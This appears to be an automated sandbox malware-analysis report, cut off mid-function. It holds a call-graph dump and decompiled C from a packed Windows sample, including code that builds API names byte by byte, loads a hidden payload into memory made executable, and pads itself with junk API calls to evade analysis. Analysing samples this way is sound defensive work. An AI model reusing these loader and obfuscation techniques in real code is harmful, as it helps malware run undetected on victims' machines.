40b353 strtoxl 89 API calls 5897->5898 5899 40a705 5898->5899 5899->5863 5901 40af81 LCMapStringW 5900->5901 5904 40af9c 5900->5904 5902 40afa4 GetLastError 5901->5902 5901->5904 5902->5904 5903 40b19a 5907 40b61c ___ansicp 89 API calls 5903->5907 5904->5903 5905 40aff6 5904->5905 5906 40b00f MultiByteToWideChar 5905->5906 5928 40b191 5905->5928 5915 40b03c 5906->5915 5906->5928 5909 40b1c2 5907->5909 5908 404c9b TranslatorGuardHandler 5 API calls 5910 40976b 5908->5910 5911 40b2b6 LCMapStringA 5909->5911 5912 40b1db 5909->5912 5909->5928 5910->5823 5946 40b212 5911->5946 5913 40b665 ___convertcp 72 API calls 5912->5913 5918 40b1ed 5913->5918 5914 40b08d MultiByteToWideChar 5919 40b0a6 LCMapStringW 5914->5919 5940 40b188 5914->5940 5917 404dca _malloc 65 API calls 5915->5917 5924 40b055 __crtLCMapStringA_stat 5915->5924 5916 40b2dd 5927 404e94 __setmbcp 65 API calls 5916->5927 5916->5928 5917->5924 5921 40b1f7 LCMapStringA 5918->5921 5918->5928 5923 40b0c7 5919->5923 5919->5940 5920 404e94 __setmbcp 65 API calls 5920->5916 5931 40b219 5921->5931 5921->5946 5922 40acab __freea 65 API calls 5922->5928 5925 40b0d0 5923->5925 5930 40b0f9 5923->5930 5924->5914 5924->5928 5929 40b0e2 LCMapStringW 5925->5929 5925->5940 5926 40b114 __crtLCMapStringA_stat 5932 40b148 LCMapStringW 5926->5932 5926->5940 5927->5928 5928->5908 5929->5940 5930->5926 5933 404dca _malloc 65 API calls 5930->5933 5934 404dca _malloc 65 API calls 5931->5934 5943 40b22a _memset __crtLCMapStringA_stat 5931->5943 5935 40b160 WideCharToMultiByte 5932->5935 5936 40b182 5932->5936 5933->5926 5934->5943 5935->5936 5937 40acab __freea 65 API calls 5936->5937 5937->5940 5938 40b268 LCMapStringA 5941 40b284 5938->5941 5942 40b288 5938->5942 5940->5922 5945 40acab __freea 65 API calls 5941->5945 5944 40b665 ___convertcp 72 API calls 5942->5944 5943->5938 5943->5946 5944->5941 5945->5946 5946->5916 5946->5920 5947->5813 5950 40a223 5948->5950 5949 406793 __encode_pointer 6 API calls 5949->5950 5950->5949 5951 40a23b 5950->5951 5951->5109 5955 405a50 5952->5955 5954 405a99 5954->5111 5956 405a5c __setmbcp 5955->5956 5963 407168 5956->5963 5962 405a7d __setmbcp 5962->5954 5964 4081fa __lock 65 API calls 5963->5964 5965 405a61 5964->5965 5966 405965 5965->5966 5967 40680e __decode_pointer 5 API calls 5966->5967 5968 405979 5967->5968 5969 40680e __decode_pointer 5 API calls 5968->5969 5970 405989 5969->5970 5971 405a0c 5970->5971 5986 40923d 5970->5986 5983 405a86 5971->5983 5973 406793 __encode_pointer 6 API calls 5974 405a01 5973->5974 5977 406793 __encode_pointer 6 API calls 5974->5977 5975 4059cb 5975->5971 5979 4091ef __realloc_crt 71 API calls 5975->5979 5980 4059e1 5975->5980 5976 4059a7 5976->5975 5982 4059f3 5976->5982 5999 4091ef 5976->5999 5977->5971 5979->5980 5980->5971 5981 406793 __encode_pointer 6 API calls 5980->5981 5981->5982 5982->5973 6048 407171 5983->6048 5987 409249 __setmbcp 5986->5987 5988 409276 5987->5988 5989 409259 5987->5989 5991 4092b7 HeapSize 5988->5991 5993 4081fa __lock 65 API calls 5988->5993 5990 4055b4 __setmbcp 65 API calls 5989->5990 5992 40925e 5990->5992 5995 40926e __setmbcp 5991->5995 5994 40554c __msize 5 API calls 5992->5994 5996 409286 ___sbh_find_block 5993->5996 5994->5995 5995->5976 6004 4092d7 5996->6004 6000 4091f8 5999->6000 6002 409237 6000->6002 6003 409218 Sleep 6000->6003 6008 40a828 6000->6008 6002->5975 6003->6000 6007 408120 LeaveCriticalSection 6004->6007 6006 4092b2 6006->5991 6006->5995 6007->6006 6009 40a834 __setmbcp 6008->6009 6010 40a849 6009->6010 6011 40a83b 6009->6011 6013 40a850 6010->6013 6014 40a85c 6010->6014 6012 404dca _malloc 65 API calls 6011->6012 6030 40a843 _realloc __setmbcp 6012->6030 6015 404e94 __setmbcp 65 API calls 6013->6015 6021 40a9ce 6014->6021 6041 40a869 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 6014->6041 6015->6030 6016 40aa01 6017 405ab2 _malloc 5 API calls 6016->6017 6020 40aa07 6017->6020 6018 4081fa __lock 65 API calls 6018->6041 6019 40a9d3 HeapReAlloc 6019->6021 6019->6030 6022 4055b4 __setmbcp 65 API calls 6020->6022 6021->6016 6021->6019 6023 40aa25 6021->6023 6024 405ab2 _malloc 5 API calls 6021->6024 6027 40aa1b 6021->6027 6022->6030 6025 4055b4 __setmbcp 65 API calls 6023->6025 6023->6030 6024->6021 6028 40aa2e GetLastError 6025->6028 6029 4055b4 __setmbcp 65 API calls 6027->6029 6028->6030 6032 40a99c 6029->6032 6030->6000 6031 40a8f4 HeapAlloc 6031->6041 6032->6030 6034 40a9a1 GetLastError 6032->6034 6033 40a949 HeapReAlloc 6033->6041 6034->6030 6035 408a0c ___sbh_alloc_block 5 API calls 6035->6041 6036 40a9b4 6036->6030 6038 4055b4 __setmbcp 65 API calls 6036->6038 6037 405ab2 _malloc 5 API calls 6037->6041 6039 40a9c1 6038->6039 6039->6028 6039->6030 6040 40a997 6042 4055b4 __setmbcp 65 API calls 6040->6042 6041->6016 6041->6018 6041->6030 6041->6031 6041->6033 6041->6035 6041->6036 6041->6037 6041->6040 6043 40825d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 6041->6043 6044 40a96c 6041->6044 6042->6032 6043->6041 6047 408120 LeaveCriticalSection 6044->6047 6046 40a973 6046->6041 6047->6046 6051 408120 LeaveCriticalSection 6048->6051 6050 405a8b 6050->5962 6051->6050 6055 4034b7 6052->6055 6053 4034c6 CharUpperBuffW SetLastError 6053->6055 6054 4034de WinHttpCreateUrl 6054->6055 6055->6053 6055->6054 6056 403514 6055->6056 6057 403532 QueryMemoryResourceNotification 6056->6057 6058 403546 LocalAlloc 6056->6058 6057->6056 6059 4035b1 6058->6059 6063 403568 6058->6063 6061 4035cb 14 API calls 6059->6061 6064 40367c 6059->6064 6061->6059 6062 403577 RegisterWaitForSingleObject GetNamedPipeHandleStateW InterlockedDecrement 6062->6063 6063->6059 6063->6062 6113 403304 6063->6113 6065 40368d LoadLibraryA 6064->6065 6066 40369d GetModuleHandleA 6064->6066 6067 4036b5 6064->6067 6065->6064 6066->6064 6069 4036e2 6067->6069 6104 4033ab LoadLibraryA 6067->6104 6106 4032ab 6069->6106 6071 403703 InterlockedDecrement 6072 4036f8 6071->6072 6072->6071 6073 403720 6072->6073 6112 402ff7 LoadLibraryA 6073->6112 6075 403725 6076 403735 10 API calls 6075->6076 6077 4037bf 6075->6077 6076->6077 6078 403870 6077->6078 6079 4037cc 14 API calls 6077->6079 6078->5129 6079->6078 6081 404a31 6080->6081 6082 404a29 GetLastError 6080->6082 6083 404a43 6081->6083 6123 4055da 6081->6123 6082->6081 6083->5122 6087 404a01 6086->6087 6088 4049f9 GetLastError 6086->6088 6089 404a13 6087->6089 6090 4055da __dosmaperr 65 API calls 6087->6090 6088->6087 6089->5126 6091 404a0d 6090->6091 6091->5126 6093 4040d7 std::_String_base::_Xlen __EH_prolog 6092->6093 6131 403d45 6093->6131 6099 40495b __setmbcp 6098->6099 6100 406a5a __getptd 65 API calls 6099->6100 6101 404960 6100->6101 6335 406d7c 6101->6335 6105 40348d VirtualProtect 6104->6105 6105->6067 6107 4032bd MoveFileWithProgressW 6106->6107 6108 4032c8 6106->6108 6107->6108 6109 4032fd 6108->6109 6110 4032e2 CopyFileExA 6108->6110 6116 4030eb 6108->6116 6109->6072 6110->6108 6112->6075 6114 403316 8 API calls 6113->6114 6115 40337a 6113->6115 6114->6115 6115->6063 6119 4030f8 6116->6119 6117 403141 FindCloseChangeNotification 6117->6119 6118 403164 FindNextVolumeA SetLocaleInfoA SetSystemTimeAdjustment InterlockedDecrement LocalFree 6118->6119 6119->6117 6119->6118 6120 4031d4 GetComputerNameA GetVolumeInformationA ReadConsoleW 6119->6120 6121 403234 ReadFile GetConsoleAliasesW InterlockedPushEntrySList 6119->6121 6122 40329c 6119->6122 6120->6119 6121->6119 6122->6108 6128 4055c7 6123->6128 6125 4055e5 _realloc 6126 4055b4 __setmbcp 65 API calls 6125->6126 6127 404a3d 6126->6127 6127->5122 6129 4069e1 __getptd_noexit 65 API calls 6128->6129 6130 4055cc 6129->6130 6130->6125 6132 403d5b std::_String_base::_Xlen 6131->6132 6141 403c20 6132->6141 6134 403d62 6135 404083 6134->6135 6136 4038a7 6135->6136 6137 4040a0 6135->6137 6136->5131 6136->5132 6138 4040ae 6137->6138 6190 403fec 6137->6190 6198 403ae1 6138->6198 6144 403b02 6141->6144 6143 403c2d 6143->6134 6147 4039c8 6144->6147 6148 4039d5 6147->6148 6149 4039e7 6147->6149 6157 404496 6148->6157 6149->6148 6150 4039f3 6149->6150 6169 402f40 6150->6169 6156 403a0b 6161 4044a0 6157->6161 6158 404dca _malloc 65 API calls 6158->6161 6159 4039e2 6159->6143 6160 405ab2 _malloc 5 API calls 6160->6161 6161->6158 6161->6159 6161->6160 6164 4044bc std::bad_alloc::bad_alloc 6161->6164 6162 4044e2 6175 403a4b 6162->6175 6164->6162 6166 405a8c __cinit 72 API calls 6164->6166 6166->6162 6167 4044fb __CxxThrowException@8 RaiseException 6168 4044fa 6167->6168 6184 4041fa 6169->6184 6172 4044fb 6173 404530 RaiseException 6172->6173 6174 404524 6172->6174 6173->6156 6174->6173 6178 40426a 6175->6178 6179 403a59 6178->6179 6180 40428a _strlen 6178->6180 6179->6167 6180->6179 6181 404dca _malloc 65 API calls 6180->6181 6182 40429d 6181->6182 6182->6179 6183 404d13 _strcpy_s 65 API calls 6182->6183 6183->6179 6185 404213 _strlen 6184->6185 6189 402f4f 6184->6189 6186 404dca _malloc 65 API calls 6185->6186 6187 404222 6186->6187 6188 404d13 _strcpy_s 65 API calls 6187->6188 6187->6189 6188->6189 6189->6172 6191 403ff6 __EH_prolog 6190->6191 6201 403fbb 6191->6201 6196 4044fb __CxxThrowException@8 RaiseException 6197 404024 6196->6197 6325 403986 6198->6325 6202 403fc9 std::_String_base::_Xlen 6201->6202 6210 403b71 6202->6210 6204 403fdb 6214 403f1b 6204->6214 6207 403f76 6316 403f3a 6207->6316 6211 403b9b std::_String_base::_Xlen 6210->6211 6212 403b7d 6210->6212 6211->6204 6212->6211 6218 403b24 6212->6218 6215 403f29 std::_String_base::_Xlen 6214->6215 6237 403e98 6215->6237 6217 403f35 6217->6207 6219 403b2d std::_String_base::_Xlen 6218->6219 6222 403a6f 6219->6222 6225 402fb1 6222->6225 6228 404367 6225->6228 6227 402fc5 6227->6211 6231 40437b _memset 6228->6231 6234 404377 ___crtGetEnvironmentStringsA 6228->6234 6229 404380 6230 4055b4 __setmbcp 65 API calls 6229->6230 6236 404385 6230->6236 6231->6229 6233 4043ca 6231->6233 6231->6234 6232 40554c __msize 5 API calls 6232->6234 6233->6234 6235 4055b4 __setmbcp 65 API calls 6233->6235 6234->6227 6235->6236 6236->6232 6238 403ea8 std::_String_base::_Xlen 6237->6238 6239 403ec3 6238->6239 6240 403eae std::_String_base::_Xlen 6238->6240 6259 403d69 6239->6259 6246 403e12 6240->6246 6243 403ec1 std::_String_base::_Xlen 6243->6217 6244 403ecd std::_String_base::_Xlen 6244->6243 6245 403b24 std::_String_base::_Xlen 65 API calls 6244->6245 6245->6243 6247 403e22 std::bad_exception::bad_exception 6246->6247 6248 403e2e std::bad_exception::bad_exception 6247->6248 6268 404194 6247->6268 6250 403e49 6248->6250 6251 403e5f 6248->6251 6278 403bbf 6250->6278 6253 403d69 std::_String_base::_Xlen 73 API calls 6251->6253 6257 403e67 std::_String_base::_Xlen 6253->6257 6254 403e53 6255 403bbf std::bad_exception::bad_exception 73 API calls 6254->6255 6256 403e5d std::_String_base::_Xlen 6255->6256 6256->6243 6257->6256 6258 403b24 std::_String_base::_Xlen 65 API calls 6257->6258 6258->6256 6260 403d75 std::_String_base::_Xlen 6259->6260 6261 403d81 6260->6261 6297 40415c 6260->6297 6262 403d86 6261->6262 6266 403d93 6261->6266 6305 403c4f 6262->6305 6265 403d91 std::_String_base::_Xlen 6265->6244 6266->6265 6267 403b71 std::_String_base::_Xlen 65 API calls 6266->6267 6267->6265 6269 4041a0 __EH_prolog3 6268->6269 6270 403fbb std::_String_base::_Xlen 73 API calls 6269->6270 6271 4041ad 6270->6271 6284 40410d 6271->6284 6274 4044fb __CxxThrowException@8 RaiseException 6275 4041cb 6274->6275 6287 404025 6275->6287 6279 403bcf 6278->6279 6281 403bd4 std::_String_base::_Xlen 6278->6281 6280 404194 std::bad_exception::bad_exception 73 API calls 6279->6280 6280->6281 6283 403c0a std::_String_base::_Xlen 6281->6283 6293 403b48 6281->6293 6283->6254 6285 403f3a std::bad_exception::bad_exception 73 API calls 6284->6285 6286 40411d 6285->6286 6286->6274 6288 40402f __EH_prolog 6287->6288 6289 40426a std::exception::exception 65 API calls 6288->6289 6290 404040 6289->6290 6291 403ef7 std::bad_exception::bad_exception 73 API calls 6290->6291 6292 404056 6291->6292 6292->6248 6294 403b51 std::_String_base::_Xlen 6293->6294 6295 403a8a std::bad_exception::bad_exception 65 API calls 6294->6295 6296 403b68 6295->6296 6296->6283 6298 404168 __EH_prolog3 6297->6298 6299 403fbb std::_String_base::_Xlen 73 API calls 6298->6299 6300 404175 6299->6300 6301 403f76 std::bad_exception::bad_exception 73 API calls 6300->6301 6302 404185 6301->6302 6303 4044fb __CxxThrowException@8 RaiseException 6302->6303 6304 404193 6303->6304 6306 403c59 std::_String_base::_Xlen __EH_prolog 6305->6306 6313 403b13 6306->6313 6308 403cfa 6310 403b71 std::_String_base::_Xlen 65 API calls 6308->6310 6309 403cb2 std::_String_base::_Xlen 6309->6308 6312 403b24 std::_String_base::_Xlen 65 API calls 6309->6312 6311 403d05 std::_String_base::_Xlen 6310->6311 6311->6265 6312->6308 6314 403a0c std::_String_base::_Xlen 73 API calls 6313->6314 6315 403b20 6314->6315 6315->6309 6317 403f44 __EH_prolog std::bad_exception::bad_exception 6316->6317 6320 403ef7 6317->6320 6321 403b71 std::_String_base::_Xlen 65 API calls 6320->6321 6322 403f06 6321->6322 6323 403e12 std::bad_exception::bad_exception 73 API calls 6322->6323 6324 403f14 6323->6324 6324->6196 6326 4039a3 6325->6326 6327 403993 6325->6327 6326->6327 6328 4039af 6326->6328 6329 404496 std::_String_base::_Xlen 73 API calls 6327->6329 6330 402f40 std::_String_base::_Xlen 65 API calls 6328->6330 6331 40399e 6329->6331 6332 4039b9 6330->6332 6331->6136 6333 4044fb __CxxThrowException@8 RaiseException 6332->6333 6334 4039c7 6333->6334 6336 406d9b 6335->6336 6339 406da2 6335->6339 6337 407404 __NMSG_WRITE 65 API calls 6336->6337 6337->6339 6347 409f10 6339->6347 6341 406db3 _memset 6342 406e8b 6341->6342 6345 406e4b SetUnhandledExceptionFilter UnhandledExceptionFilter 6341->6345 6371 407382 6342->6371 6345->6342 6348 40680e __decode_pointer 5 API calls 6347->6348 6349 406da8 6348->6349 6349->6341 6350 409f1d 6349->6350 6354 409f29 __setmbcp 6350->6354 6351 409f85 6352 409f66 6351->6352 6357 409f94 6351->6357 6356 40680e __decode_pointer 5 API calls 6352->6356 6353 409f50 6355 4069e1 __getptd_noexit 65 API calls 6353->6355 6354->6351 6354->6352 6354->6353 6360 409f4c 6354->6360 6358 409f55 _siglookup 6355->6358 6356->6358 6359 4055b4 __setmbcp 65 API calls 6357->6359 6362 409ffb 6358->6362 6364 407382 _abort 65 API calls 6358->6364 6365 409f5e __setmbcp 6358->6365 6361 409f99 6359->6361 6360->6353 6360->6357 6363 40554c __msize 5 API calls 6361->6363 6366 4081fa __lock 65 API calls 6362->6366 6367 40a006 6362->6367 6363->6365 6364->6362 6365->6341 6366->6367 6368 406805 FindHandlerForForeignException 6 API calls 6367->6368 6369 40a03b 6367->6369 6368->6369 6374 40a091 6369->6374 6379 407240 6371->6379 6373 406e92 6375 40a097 6374->6375 6376 40a09e 6374->6376 6378 408120 LeaveCriticalSection 6375->6378 6376->6365 6378->6376 6380 40724c __setmbcp 6379->6380 6381 4081fa __lock 65 API calls 6380->6381 6382 407253 6381->6382 6384 40680e __decode_pointer 5 API calls 6382->6384 6388 40730c __initterm 6382->6388 6386 40728a 6384->6386 6386->6388 6390 40680e __decode_pointer 5 API calls 6386->6390 6387 407354 __setmbcp 6387->6373 6396 407357 6388->6396 6394 40729f 6390->6394 6391 40734b 6392 407150 _fast_error_exit 2 API calls 6391->6392 6392->6387 6393 406805 6 API calls FindHandlerForForeignException 6393->6394 6394->6388 6394->6393 6395 40680e 5 API calls __decode_pointer 6394->6395 6395->6394 6397 407338 6396->6397 6398 40735d 6396->6398 6397->6387 6400 408120 LeaveCriticalSection 6397->6400 6401 408120 LeaveCriticalSection 6398->6401 6400->6391 6401->6397 6482 40707c 6483 4070b8 6482->6483 6485 40708e 6482->6485 6484 40494f CallUnexpected 67 API calls 6484->6483 6485->6483 6485->6484 6733 4070be SetUnhandledExceptionFilter

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 60 4033ab-4034a8 LoadLibraryA VirtualProtect
                    C-Code - Quality: 100%
                    			E004033AB(void* __ecx) {
                    				long _v8;
                    				struct HINSTANCE__* _t2;
                    				int _t4;
                    				CHAR* _t8;
                    
                    				_t8 = "msimg32.dll";
                    				 *0x4205ce = 0x33;
                    				 *0x4205cf = 0x32;
                    				 *0x4205d3 = 0x6c;
                    				M004205CB = 0x6e;
                    				"msimg32.dll" = 0x6b;
                    				M004205CC = 0x65;
                    				"32.dll" = 0x6c;
                    				"simg32.dll" = 0x65;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x2e;
                    				 *0x4205d1 = 0x64;
                    				 *0x4205d2 = 0x6c;
                    				 *0x4205d4 = 0;
                    				_t2 = LoadLibraryA(_t8);
                    				 *0x57860c = _t2;
                    				 *0x4205d3 = 0x65;
                    				"simg32.dll" = 0x69;
                    				M004205CC = 0x75;
                    				 *0x4205ce = 0x6c;
                    				"32.dll" = 0x61;
                    				 *0x4205d1 = 0x6f;
                    				 *0x4205d5 = 0x74;
                    				"msimg32.dll" = 0x56;
                    				 *0x4205d4 = 0x63;
                    				 *0x4205cf = 0x50;
                    				 *0x4205d6 = 0;
                    				M004205CB = 0x74;
                    				 *0x4205d2 = 0x74;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x72;
                    				"`ghvmsimg32.dll" = GetProcAddress(_t2, _t8);
                    				_t4 = VirtualProtect( *0x574b0c,  *0x57a190, 0x40,  &_v8); // executed
                    				return _t4;
                    			}







                    0x004033b0
                    0x004033b6
                    0x004033bd
                    0x004033c4
                    0x004033cb
                    0x004033d2
                    0x004033d9
                    0x004033e0
                    0x004033e7
                    0x004033ee
                    0x004033f5
                    0x004033fc
                    0x00403403
                    0x0040340a
                    0x00403411
                    0x00403419
                    0x0040341e
                    0x00403425
                    0x0040342c
                    0x00403433
                    0x0040343a
                    0x00403441
                    0x00403448
                    0x0040344f
                    0x00403456
                    0x0040345d
                    0x00403464
                    0x0040346b
                    0x00403472
                    0x00403479
                    0x00403480
                    0x00403499
                    0x004034a4
                    0x004034a8

                    APIs
                    • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00403411
                    • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00403487
                    • VirtualProtect.KERNELBASE(00000040,?), ref: 004034A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.305900094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.305895844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305908614.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305913456.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305930494.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305960219.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.305967075.000000000057B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_b8E3zd5AYc.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProcProtectVirtual
                    • String ID: msimg32.dll$NhvPhv
                    • API String ID: 3509694964-2647807948
                    • Opcode ID: 64161e06727999188c498412df7b596d9faeac2c10d97adf832841b133585d92
                    • Instruction ID: d1576c4a165af817aa8c7486d1d3c4258ab4b3a0ec6bb34203ef70a554402430
                    • Opcode Fuzzy Hash: 64161e06727999188c498412df7b596d9faeac2c10d97adf832841b133585d92
                    • Instruction Fuzzy Hash: D42166106092C0FDE722C728AD087123ED56B22749F8800A9D1849A2B3C7FA11DADF7E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 83 8eceaa-8ecec3 84 8ecec5-8ecec7 83->84 85 8ecece-8eceda CreateToolhelp32Snapshot 84->85 86 8ecec9 84->86 87 8ecedc-8ecee2 85->87 88 8eceea-8ecef7 Module32First 85->88 86->85 87->88 95 8ecee4-8ecee8 87->95 89 8ecef9-8ecefa call 8ecb69 88->89 90 8ecf00-8ecf08 88->90 93 8eceff 89->93 93->90 95->84 95->88
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008ECED2
                    • Module32First.KERNEL32(00000000,00000224), ref: 008ECEF2
                    Memory Dump Source
                    • Source File: 00000000.00000002.306092360.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008E8000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_8e8000_b8E3zd5AYc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 9ef67dbedeeae875a89bc4ca6ebb94ba7d60ab9f613cdf39382f23931cf213fd
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 5BF06232A007556FD7202ABAEC8DF6E76E9FF4A764F100528E653D10C0DB70E8464665
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4034aa-4034bc call 404450 3 4034be-4034c4 0->3 4 4034d5-4034dc 3->4 5 4034c6-4034cf CharUpperBuffW SetLastError 3->5 6 4034f1-4034f7 4->6 7 4034de-4034eb WinHttpCreateUrl 4->7 5->4 8 4034f9-403500 6->8 9 40350b-403512 6->9 7->6 8->9 10 403502-403509 8->10 9->3 11 403514 9->11 10->9 10->11 12 403516-40351c 11->12 13 403529-403530 12->13 14 40351e-403523 12->14 15 403532-403537 QueryMemoryResourceNotification 13->15 16 40353d-403544 13->16 14->13 15->16 16->12 17 403546-403566 LocalAlloc 16->17 18 4035b1-4035b7 17->18 19 403568-403575 call 403304 17->19 21 4035be-4035c5 18->21 25 403577-4035a2 RegisterWaitForSingleObject GetNamedPipeHandleStateW InterlockedDecrement 19->25 26 4035a8-4035af 19->26 23 403673-403676 21->23 24 4035cb-403671 EnumDateFormatsA InterlockedExchangeAdd DeleteFiber GetPrivateProfileStructA InitializeCriticalSectionAndSpinCount InterlockedExchange RtlCaptureContext FindResourceW LocalSize OpenMutexW GetStringTypeExA GetComputerNameA LeaveCriticalSection RegisterWaitForSingleObject 21->24 23->21 27 40367c-40367f 23->27 24->23 25->26 26->18 26->19 28 403684-40368b 27->28 29 403694-40369b 28->29 30 40368d-40368e LoadLibraryA 28->30 31 4036a9-4036b3 29->31 32 40369d-4036a4 GetModuleHandleA 29->32 30->29 31->28 33 4036b5-4036cd 31->33 32->31 35 4036cf-4036d2 33->35 36 4036d4 call 4033ab 35->36 37 4036d9-4036e0 35->37 36->37 37->35 39 4036e2-4036f8 call 4032ab 37->39 42 4036fa-403701 39->42 43 403703-403704 InterlockedDecrement 42->43 44 40370a-403710 42->44 43->44 45 403712 call 40339d 44->45 46 403717-40371e 44->46 45->46 46->42 48 403720 call 402ff7 46->48 50 403725-40372f 48->50 51 403735-4037b9 GetModuleHandleW FormatMessageA CreateActCtxW VerifyVersionInfoW InterlockedIncrement * 2 GetCommandLineA WriteConsoleOutputW GetBinaryTypeA GetCommandLineA 50->51 52 4037bf-4037c6 50->52 51->52 53 403870-40387b call 403397 52->53 54 4037cc-40386a WriteConsoleW lstrcpynW CopyFileA LoadLibraryA MoveFileWithProgressA PostQueuedCompletionStatus GetCPInfo InterlockedDecrement GetPrivateProfileStructA DeleteVolumeMountPointA GetVolumeNameForVolumeMountPointA GetConsoleAliasesLengthW GetFileTime GetStringTypeW 52->54 54->53
                    C-Code - Quality: 70%
                    			E004034AA(void* __ecx) {
                    				void* _v6;
                    				short _v8;
                    				void* _v10;
                    				long _v12;
                    				struct _FILETIME _v20;
                    				long _v24;
                    				struct _FILETIME _v32;
                    				long _v36;
                    				struct _FILETIME _v44;
                    				void* _v60;
                    				struct _OVERLAPPED _v64;
                    				struct _CRITICAL_SECTION _v68;
                    				struct _CRITICAL_SECTION _v92;
                    				intOrPtr _v96;
                    				char _v100;
                    				struct _OSVERSIONINFOEXW _v392;
                    				void _v1416;
                    				short _v2440;
                    				char _v3156;
                    				void _v4180;
                    				short _v5204;
                    				void* _t61;
                    				long _t86;
                    				void* _t137;
                    				intOrPtr* _t138;
                    				CHAR* _t139;
                    				void* _t140;
                    				void* _t141;
                    				int _t146;
                    				void* _t147;
                    				void* _t148;
                    				long _t162;
                    				void* _t164;
                    
                    				_t137 = __ecx;
                    				E00404450(0x1450);
                    				_t146 = 0;
                    				L1:
                    				L1:
                    				if(_t146 < 0x14d003) {
                    					CharUpperBuffW(0, 0);
                    					SetLastError(0);
                    				}
                    				if( *0x57a190 == 0x6b) {
                    					__imp__WinHttpCreateUrl(0, 0,  &_v2440,  &(_v20.dwHighDateTime));
                    				}
                    				if(_t146 <= 0x1e9d5e41 || _v20.dwHighDateTime == 0xad5cf7 || _v96 == 0xad4c41c) {
                    					goto L8;
                    				}
                    				L9:
                    				_t147 = 0;
                    				do {
                    					if(_t147 == 0x420) {
                    						 *0x57a190 =  *0x57a190 + 0x38d6;
                    					}
                    					if( *0x57a190 == 0x7a) {
                    						__imp__QueryMemoryResourceNotification(0,  &(_v20.dwHighDateTime));
                    					}
                    					_t147 = _t147 + 1;
                    				} while (_t147 < 0x40dece);
                    				_t61 = LocalAlloc(0,  *0x57a190); // executed
                    				_t138 = __imp__RegisterWaitForSingleObject;
                    				_t148 = 0;
                    				 *0x574b0c = _t61;
                    				_t162 =  *0x57a190; // 0xf298
                    				if(_t162 > 0) {
                    					do {
                    						E00403304(_t148);
                    						if( *0x57a190 == 0x1f) {
                    							 *_t138(0, 0, 0, 0, 0, 0);
                    							GetNamedPipeHandleStateW(0,  &(_v32.dwHighDateTime),  &_v8,  &_v12,  &(_v20.dwHighDateTime),  &_v2440, 0);
                    							InterlockedDecrement( &_v24);
                    						}
                    						_t148 = _t148 + 1;
                    						_t164 = _t148 -  *0x57a190; // 0xf298
                    					} while (_t164 < 0);
                    				}
                    				_v12 = 0x5aedbe7;
                    				do {
                    					if( *0x57a190 == 0x37) {
                    						EnumDateFormatsA(0, 0, 0);
                    						InterlockedExchangeAdd( &_v24, 0);
                    						DeleteFiber(0);
                    						GetPrivateProfileStructA("gosizepeyabuxijavusadiculihazasa", "sijewenudapegiginotolut",  &_v4180, 0, "mupexabetor");
                    						InitializeCriticalSectionAndSpinCount( &_v68, 0);
                    						InterlockedExchange(0, 0);
                    						__imp__RtlCaptureContext( &_v3156);
                    						FindResourceW(0, 0, 0);
                    						LocalSize(0);
                    						OpenMutexW(0, 0, 0);
                    						GetStringTypeExA(0, 0, "Dopayenecavet", 0,  &_v8);
                    						GetComputerNameA( &_v1416,  &(_v32.dwHighDateTime));
                    						LeaveCriticalSection( &_v92);
                    						_v20.dwHighDateTime = 0;
                    						 *_t138( &(_v20.dwHighDateTime), 0, 0, 0, 0, 0);
                    					}
                    					_t23 =  &_v12;
                    					 *_t23 = _v12 - 1;
                    				} while ( *_t23 != 0);
                    				_v8 = 0;
                    				_t139 = "msimg32.dll";
                    				do {
                    					if( *0x57a190 == 0x2e) {
                    						LoadLibraryA(0);
                    					}
                    					if(_v8 == 0x76069) {
                    						 *0x57860c = GetModuleHandleA(_t139);
                    					}
                    					_v8 = _v8 + 1;
                    				} while (_v8 < 0x1756bb);
                    				"msimg32.dll" = 0;
                    				"`ghvmsimg32.dll" = GetProcAddress( *0x57860c, _t139);
                    				_t140 = 0;
                    				do {
                    					if(_t140 == 0x1c) {
                    						E004033AB(_t137); // executed
                    					}
                    					_t140 = _t140 + 1;
                    				} while (_t140 < 0x3debc7);
                    				_t86 = E004032AB( *0x574b0c,  *0x57a190, 0x40f010);
                    				_t141 = 0;
                    				do {
                    					if( *0x57a190 == 0x10) {
                    						_t86 = InterlockedDecrement(0);
                    					}
                    					if(_t141 == 0x1e674) {
                    						_t86 = E0040339D(_t86);
                    					}
                    					_t141 = _t141 + 1;
                    				} while (_t141 < 0x3e4e2);
                    				E00402FF7();
                    				if( *0x57a190 == 0x1144) {
                    					GetModuleHandleW(L"tizep");
